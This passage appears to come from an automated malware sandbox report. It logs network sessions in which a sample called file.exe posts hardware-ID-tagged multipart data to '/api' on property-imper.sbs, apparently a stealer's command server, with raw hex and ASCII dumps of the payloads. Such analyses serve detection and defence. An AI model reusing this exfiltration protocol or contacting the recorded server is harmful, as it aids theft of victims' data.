                                                                                                                                                                                                Data Ascii: auO9sutkTXHkqQ5q+SBpJsoNOagvnrVh6B71r/iO2SuOBxngmiSNIaDoerttYFmSn7n52L/+RYEYvjU7XDrZ6jry3YLLZL1R5PnuClnQSYaqXZ0cu640pX16Z1pMuhkuC/Z8dovkeeTw6T6auRAphqq9qVj//kWgWH5lKt1K2cpawq3iy/QtgUStir75Ea1THj8p2C0+NJV5CoTP/BodX44CjVIrZG3RFNk+CllwWdZLHcnor+5F0RiedaucGkl
                                                                                                                                                                                                2024-11-23 15:53:07 UTC382INData Raw: 5a 46 6f 64 73 79 42 31 4a 69 4f 4b 34 6d 55 4c 62 4b 61 79 66 79 62 79 36 37 56 55 4d 6e 76 42 59 72 38 48 74 71 75 37 67 4d 5a 35 77 2b 58 37 64 47 55 43 66 38 37 37 62 4a 59 4e 6a 70 4d 2b 57 6b 76 57 6b 48 46 65 4a 70 67 33 73 69 4f 32 52 73 65 42 78 6a 6e 72 69 48 6f 31 41 48 73 72 36 34 59 39 43 67 79 6e 37 6a 64 2f 46 36 4b 51 4b 56 38 6a 6c 52 36 33 41 72 6f 4f 6a 35 78 66 67 44 36 4e 47 32 41 42 66 70 74 75 6f 6a 41 2b 54 66 72 4b 54 68 49 62 30 36 6c 55 42 7a 36 67 56 73 49 62 31 72 4f 44 6f 61 65 46 6d 2b 56 4f 65 54 77 36 74 35 71 47 59 42 59 4e 34 37 76 69 4c 69 50 7a 7a 51 31 66 42 70 6c 50 2f 6e 76 33 62 34 4b 51 34 6e 6e 44 70 47 59 56 43 48 63 2b 31 2f 59 6c 4d 6a 43 6d 31 6e 38 6e 58 74 4b 52 41 56 39 65 6d 45 72 7a 55 76 35 4f 6a 74 69
                                                                                                                                                                                                Data Ascii: ZFodsyB1JiOK4mULbKayfyby67VUMnvBYr8Htqu7gMZ5w+X7dGUCf877bJYNjpM+WkvWkHFeJpg3siO2RseBxjnriHo1AHsr64Y9Cgyn7jd/F6KQKV8jlR63AroOj5xfgD6NG2ABfptuojA+TfrKThIb06lUBz6gVsIb1rODoaeFm+VOeTw6t5qGYBYN47viLiPzzQ1fBplP/nv3b4KQ4nnDpGYVCHc+1/YlMjCm1n8nXtKRAV9emErzUv5Ojti
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 32 36 64 39 0d 0a 6e 6e 68 66 64 50 72 52 45 31 52 5a 77 70 73 75 69 6c 77 47 62 4b 35 4c 4a 6e 4a 58 35 34 56 55 70 73 65 68 53 71 38 47 6a 6b 36 44 67 5a 35 34 6e 2b 52 50 6e 56 77 62 59 32 75 48 57 47 74 55 78 34 2b 71 53 69 2f 54 6a 52 41 62 43 78 55 4f 79 79 61 61 55 34 4f 35 70 32 47 6a 68 47 35 42 58 53 6f 6d 6c 39 38 5a 51 7a 6a 7a 77 69 4d 48 58 35 61 70 4c 56 35 6d 6d 44 65 32 49 37 59 66 67 2b 47 6d 5a 4a 72 52 4b 33 52 6c 4e 69 76 65 70 6c 52 53 57 4c 70 33 68 73 49 6a 78 36 46 38 59 68 4e 68 72 6e 73 75 6d 6d 61 32 76 49 75 41 57 72 45 6a 51 47 55 6d 4f 39 4f 2f 59 51 70 6f 70 2b 2b 62 52 7a 62 72 62 48 46 65 58 70 67 33 2f 38 36 36 62 72 71 63 2f 7a 32 57 59 52 74 55 62 51 35 66 75 37 39 68 43 6b 79 6e 37 6a 39 2f 46 2f 76 55 53 54 39 2b 30
                                                                                                                                                                                                Data Ascii: 26d9nnhfdPrRE1RZwpsuilwGbK5LJnJX54VUpsehSq8Gjk6DgZ54n+RPnVwbY2uHWGtUx4+qSi/TjRAbCxUOyyaaU4O5p2GjhG5BXSoml98ZQzjzwiMHX5apLV5mmDe2I7Yfg+GmZJrRK3RlNiveplRSWLp3hsIjx6F8YhNhrnsumma2vIuAWrEjQGUmO9O/YQpop++bRzbrbHFeXpg3/866brqc/z2WYRtUbQ5fu79hCkyn7j9/F/vUST9+0
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 4f 2b 72 4b 59 75 78 43 2b 2f 62 66 35 58 41 4e 6a 71 37 38 34 37 31 53 48 6a 34 4e 2f 46 34 71 51 4b 56 37 72 6c 57 37 48 42 75 34 54 74 68 54 37 64 4f 4c 39 49 6e 6c 6b 4f 6e 71 58 33 78 6b 7a 56 62 62 4b 66 79 64 57 6f 76 77 64 45 32 4c 59 48 6f 49 69 30 31 62 62 67 63 59 78 6d 2b 56 6d 65 54 77 37 66 35 72 32 45 42 4a 5a 2f 6f 4a 69 76 75 39 7a 6e 51 78 32 75 36 30 57 34 2b 4a 4f 41 6f 36 34 6e 32 54 36 6f 43 35 42 58 51 64 69 39 6c 74 5a 4b 32 57 2b 67 79 64 47 36 74 4b 52 4b 56 39 65 6d 59 4c 7a 49 6f 35 4b 32 73 57 54 34 4b 36 68 42 2f 78 70 65 6e 36 58 68 31 67 54 56 4d 66 43 52 30 59 48 72 70 41 70 48 33 62 30 41 37 4a 48 39 78 37 2f 75 4d 4a 34 2b 2b 52 4f 4d 57 51 36 4b 70 66 66 57 52 5a 5a 37 73 64 6d 53 6b 2f 6d 6a 62 43 6d 36 35 56 75 78 77
                                                                                                                                                                                                Data Ascii: O+rKYuxC+/bf5XANjq78471SHj4N/F4qQKV7rlW7HBu4TthT7dOL9InlkOnqX3xkzVbbKfydWovwdE2LYHoIi01bbgcYxm+VmeTw7f5r2EBJZ/oJivu9znQx2u60W4+JOAo64n2T6oC5BXQdi9ltZK2W+gydG6tKRKV9emYLzIo5K2sWT4K6hB/xpen6Xh1gTVMfCR0YHrpApH3b0A7JH9x7/uMJ4++ROMWQ6KpffWRZZ7sdmSk/mjbCm65Vuxw


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.449732172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:09 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=LGQBS4NWX0ENRDE2
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 18157
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:09 UTC15331OUTData Raw: 2d 2d 4c 47 51 42 53 34 4e 57 58 30 45 4e 52 44 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 44 32 43 32 33 37 44 38 43 44 43 35 34 41 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4c 47 51 42 53 34 4e 57 58 30 45 4e 52 44 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 47 51 42 53 34 4e 57 58 30 45 4e 52 44 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                                Data Ascii: --LGQBS4NWX0ENRDE2Content-Disposition: form-data; name="hwid"27D2C237D8CDC54AD7CBBD6DF28D3732--LGQBS4NWX0ENRDE2Content-Disposition: form-data; name="pid"2--LGQBS4NWX0ENRDE2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                                2024-11-23 15:53:09 UTC2826OUTData Raw: 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36
                                                                                                                                                                                                Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                                                                                2024-11-23 15:53:10 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:10 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=7g1l3keoqh73dkr0be6e9bsjc2; expires=Wed, 19-Mar-2025 09:39:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPkfTXl%2FAA2JqpoEKCUrY4h%2BUG7QkgQHC4d8%2BhJRrCZqfqurNfkAMAn2PUubc9M6R66XrHhenjj5jBReay7F1Infa45TdzjmvpaWnX7Db%2BhItoR0v3zHzyVBnadFEu8xrQG%2BHyM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e72549ccf898ccc-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=14&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19119&delivery_rate=1534419&cwnd=198&unsent_bytes=0&cid=d7b407469ae1695f&ts=1074&x=0"
                                                                                                                                                                                                2024-11-23 15:53:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-23 15:53:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.449733172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:12 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=1CNB66RTISR
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 8748
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:12 UTC8748OUTData Raw: 2d 2d 31 43 4e 42 36 36 52 54 49 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 44 32 43 32 33 37 44 38 43 44 43 35 34 41 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 31 43 4e 42 36 36 52 54 49 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 43 4e 42 36 36 52 54 49 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 43 4e 42 36 36 52 54 49 53 52
                                                                                                                                                                                                Data Ascii: --1CNB66RTISRContent-Disposition: form-data; name="hwid"27D2C237D8CDC54AD7CBBD6DF28D3732--1CNB66RTISRContent-Disposition: form-data; name="pid"2--1CNB66RTISRContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--1CNB66RTISR
                                                                                                                                                                                                2024-11-23 15:53:13 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:12 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=4sr7rtfj7miviierlom36hfft1; expires=Wed, 19-Mar-2025 09:39:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3g8vZdlNWNnJDONs9cno2BSxvvZUQ5VtAgdzrAiOyqjJOW0Bhqp3ovJSeeZ0cl1QNqF77IXD0X8mDW6khL9lOdeyPPfRtdBMM7XV5agvXZrqrbmoSZvWYY%2Fyq4v5Sl5MagdsvkQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e7254ac4ec541fb-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=14511&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9682&delivery_rate=1513737&cwnd=189&unsent_bytes=0&cid=d9da309ba040502a&ts=868&x=0"
                                                                                                                                                                                                2024-11-23 15:53:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-23 15:53:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.449734172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:14 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=0HKA0GXY5
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 20389
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:14 UTC15331OUTData Raw: 2d 2d 30 48 4b 41 30 47 58 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 44 32 43 32 33 37 44 38 43 44 43 35 34 41 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 48 4b 41 30 47 58 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 48 4b 41 30 47 58 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 48 4b 41 30 47 58 59 35 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                Data Ascii: --0HKA0GXY5Content-Disposition: form-data; name="hwid"27D2C237D8CDC54AD7CBBD6DF28D3732--0HKA0GXY5Content-Disposition: form-data; name="pid"3--0HKA0GXY5Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0HKA0GXY5Conten
                                                                                                                                                                                                2024-11-23 15:53:14 UTC5058OUTData Raw: 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52
                                                                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO@dR
                                                                                                                                                                                                2024-11-23 15:53:15 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:15 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=nnhpaso8f7q858eciil789s7p0; expires=Wed, 19-Mar-2025 09:39:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WzihApBQvb2RrKg4yYFhkbCNqxpycXEVBsK6Bj3Hgva8T4dxc9UkxckVO4NG8PccJvJEwbsYRnSotIBkmmVp2wqSmzNDMuovImhKMRXgCzdecbhjZul1MM%2BYbgnX4DJQkJ8NmWA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e7254bc3b7fefa3-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1774&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21344&delivery_rate=1593886&cwnd=32&unsent_bytes=0&cid=31810a4887968fc0&ts=883&x=0"
                                                                                                                                                                                                2024-11-23 15:53:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-23 15:53:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.449735172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:17 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=6GLE4WCT
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 1192
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:17 UTC1192OUTData Raw: 2d 2d 36 47 4c 45 34 57 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 44 32 43 32 33 37 44 38 43 44 43 35 34 41 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 36 47 4c 45 34 57 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 47 4c 45 34 57 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 47 4c 45 34 57 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                Data Ascii: --6GLE4WCTContent-Disposition: form-data; name="hwid"27D2C237D8CDC54AD7CBBD6DF28D3732--6GLE4WCTContent-Disposition: form-data; name="pid"1--6GLE4WCTContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--6GLE4WCTContent-Di
                                                                                                                                                                                                2024-11-23 15:53:17 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:17 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=oonm2ghuf6ef1do821so8jq3is; expires=Wed, 19-Mar-2025 09:39:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eu0CUzO8Fb2ILqfTlLj3rDUh%2BhtWhGP%2F5jKH%2By%2F2IAJ2ObbBL1mtJKncgGXpYnbbBqMODGFbSmLSToCgei2XHKgDyT5YUZZBfRWeDLBdBmfX%2B%2Bbtyo%2BkjX9XnwyYj29Kyz6pjR0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e7254cbfa4c4390-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1712&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2101&delivery_rate=1253756&cwnd=243&unsent_bytes=0&cid=2712cf6146a9abb6&ts=612&x=0"
                                                                                                                                                                                                2024-11-23 15:53:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-23 15:53:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.449737172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:19 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=0QRBOG5PNB8YU78C5
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 549409
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: 2d 2d 30 51 52 42 4f 47 35 50 4e 42 38 59 55 37 38 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 44 32 43 32 33 37 44 38 43 44 43 35 34 41 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 51 52 42 4f 47 35 50 4e 42 38 59 55 37 38 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 51 52 42 4f 47 35 50 4e 42 38 59 55 37 38 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                Data Ascii: --0QRBOG5PNB8YU78C5Content-Disposition: form-data; name="hwid"27D2C237D8CDC54AD7CBBD6DF28D3732--0QRBOG5PNB8YU78C5Content-Disposition: form-data; name="pid"1--0QRBOG5PNB8YU78C5Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
